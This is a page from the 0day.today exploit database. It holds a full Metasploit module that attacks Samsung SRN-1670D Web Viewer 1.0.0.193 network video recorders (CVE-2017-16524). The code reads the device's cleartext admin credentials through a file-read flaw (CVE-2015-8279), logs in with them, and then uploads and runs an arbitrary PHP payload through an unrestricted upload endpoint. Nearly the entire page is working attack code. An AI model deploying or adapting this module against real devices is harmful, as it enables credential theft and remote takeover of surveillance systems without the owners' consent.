0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload Exploit
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Unrestricted file upload vulnerability - Web Viewer 1.0.0.193 on Samsung SRN-1670D
# Exploit Author: Omar MEZRAG - 0xFFFFFF / www.realistic-security.com
# Vendor Homepage: https://www.hanwhasecurity.com
# Version: Web Viewer 1.0.0.193 on Samsung SRN-1670D
# Tested on: Web Viewer 1.0.0.193
# CVE : CVE-2017-16524
##
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'digest'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Samsung SRN-1670D - Web Viewer Version 1.0.0.193 Arbitrary File Read & Upload',
'Description' => %q{
This module exploits an Unrestricted file upload vulnerability in
Web Viewer 1.0.0.193 on Samsung SRN-1670D devices: 'network_ssl_upload.php'
allows remote authenticated attackers to upload and execute arbitrary
PHP code via a filename with a .php extension, which is then accessed via a
direct request to the file in the upload/ directory.
To authenticate for this attack, one can obtain web-interface credentials
in cleartext by leveraging the existing Local File Read Vulnerability
referenced as CVE-2015-8279, which allows remote attackers to read the
web interface credentials via a request for the
cslog_export.php?path=/root/php_modules/lighttpd/sbin/userpw URI.
},
'Author' => [
'Omar Mezrag <omar.mezrag@realistic-security.com>', # @_0xFFFFFF
'Realistic Security',
'Algeria'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-16524' ],
[ 'URL', 'https://github.com/realistic-security/CVE-2017-16524' ],
[ 'CVE', '2015-8279' ],
[ 'URL', 'http://blog.emaze.net/2016/01/multiple-vulnerabilities-samsung-srn.html' ]
],
'Privileged' => true,
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
['Samsung SRN-1670D == 1.0.0.193', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 14 2017'
))
register_options(
[
OptString.new('RHOST', [ true, 'The target address.' ]),
OptString.new('RPORT', [ true, 'The target port (TCP).', '80' ]),
])
end
def check
#
print_status('Checking version...')
resp = send_request_cgi({
'uri' => "/index",
'version' => '1.1',
'method' => 'GET',
'headers' =>
{
'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
}
})
unless resp
print_error("Connection timed out.")
return Exploit::CheckCode::Unknown
end
# <!--------------------------------- File Version 1.0.0.193 --------------------------------->
version = nil
if resp and resp.code == 200 and resp.body.match(/Web Viewer for Samsung NVR/)
if resp.body =~ /File Version (\d+\.\d+\.\d+\.\d+)/
version = $1
if version == '1.0.0.193'
print_good "Found vesrion: #{version}"
return Exploit::CheckCode::Appears
end
end
end
Exploit::CheckCode::Safe
end
def exploit
print_status('Obtaining credentails...')
resp = send_request_cgi({
'uri' => "/cslog_export.php",
'version' => '1.1',
'method' => 'GET',
'vars_get'=>
{
'path' => '/root/php_modules/lighttpd/sbin/userpw',
'file' => 'foo'
},
'headers' =>
{
'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
}
})
unless resp
print_error("Connection timed out.")
return Exploit::CheckCode::Unknown
end
if resp and resp.code == 200 and resp.body !~ /Authentication is failed/ and resp.body !~ /File not found/
username = resp.body.split(':')[0]
password = resp.body.split(':')[1].gsub("\n",'')
print_good "Credentials obtained successfully: #{username}:#{password}"
data1 = Rex::Text.encode_base64("#{username}")
data2 = Digest::SHA256.hexdigest("#{password}")
randfloat = Random.new
data3 = randfloat.rand(0.9)
data4 = data3
print_status('Logging...')
resp = send_request_cgi({
'uri' => "/login",
'version' => '1.1',
'method' => 'POST',
'vars_post'=>
{
'data1' => data1,
'data2' => data2,
'data3' => data3,
'data4' => data4
},
'headers' =>
{
'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
'DNT' => "1",
'Cookie' => "IESEVEN=1"
}
})
unless resp
print_error("Connection timed out.")
return Exploit::CheckCode::Unknown
end
if resp and resp.code == 200 and resp.body !~ /ID incorrecte/ and resp.body =~ /setCookie\('NVR_DATA1/
print_good('Authentication Succeeded')
nvr_d1 = $1 if resp.body =~ /setCookie\('NVR_DATA1', '(\d\.\d+)'/
nvr_d2 = $1 if resp.body =~ /setCookie\('NVR_DATA2', '(\d+)'/
nvr_d3 = $1 if resp.body =~ /setCookie\('NVR_DATA3', '(0x\h\h)'/
nvr_d4 = $1 if resp.body =~ /setCookie\('NVR_DATA4', '(0x\h\h)'/
nvr_d7 = $1 if resp.body =~ /setCookie\('NVR_DATA7', '(\d)'/
nvr_d8 = $1 if resp.body =~ /setCookie\('NVR_DATA8', '(\d)'/
nvr_d9 = $1 if resp.body =~ /setCookie\('NVR_DATA9', '(0x\h\h)'/
cookie = "IESEVEN=1; NVR_DATA1=#{nvr_d1}; NVR_DATA2=#{nvr_d2}; NVR_DATA3=#{nvr_d3}; NVR_DATA4=#{nvr_d4}; NVR_DATA7=#{nvr_d7}; NVR_DATA8=#{nvr_d8}; NVR_DATA9=#{nvr_d9}"
payload_name = "#{rand_text_alpha(8)}.php"
print_status("Generating payload[ #{payload_name} ]...")
php_payload = get_write_exec_payload(:unlink_self=>true)
print_status('Uploading payload...')
data = Rex::MIME::Message.new
data.add_part("2", nil, nil, 'form-data; name="is_apply"')
data.add_part("1", nil, nil, 'form-data; name="isInstall"')
data.add_part("0", nil, nil, 'form-data; name="isCertFlag"')
data.add_part(php_payload, 'application/x-httpd-php', nil, "form-data; name=\"attachFile\"; filename=\"#{payload_name}\"")
post_data = data.to_s
resp = send_request_cgi({
'uri' => normalize_uri('/network_ssl_upload.php'),
'method' => 'POST',
'vars_get' =>
{
'lang' => 'en'
},
'headers' =>
{
'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
},
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'cookie' => cookie,
'data' => post_data
})
unless resp
print_error("Connection timed out.")
return Exploit::CheckCode::Unknown
end
if resp and resp.code == 200
print_status('Executing payload...')
upload_uri = normalize_uri("/upload/" + payload_name)
send_request_cgi({
'uri' => upload_uri,
'method' => 'GET'
},5)
unless resp
print_error("Connection timed out.")
return Exploit::CheckCode::Unknown
end
if resp and resp.code != 200
print_error("Failed to upload")
end
else
print_error("Failed to upload")
end
else
print_error("Authentication failed")
end
else
print_error "Error obtaining credentails"
end
end
end
# 0day.today [2024-11-15] #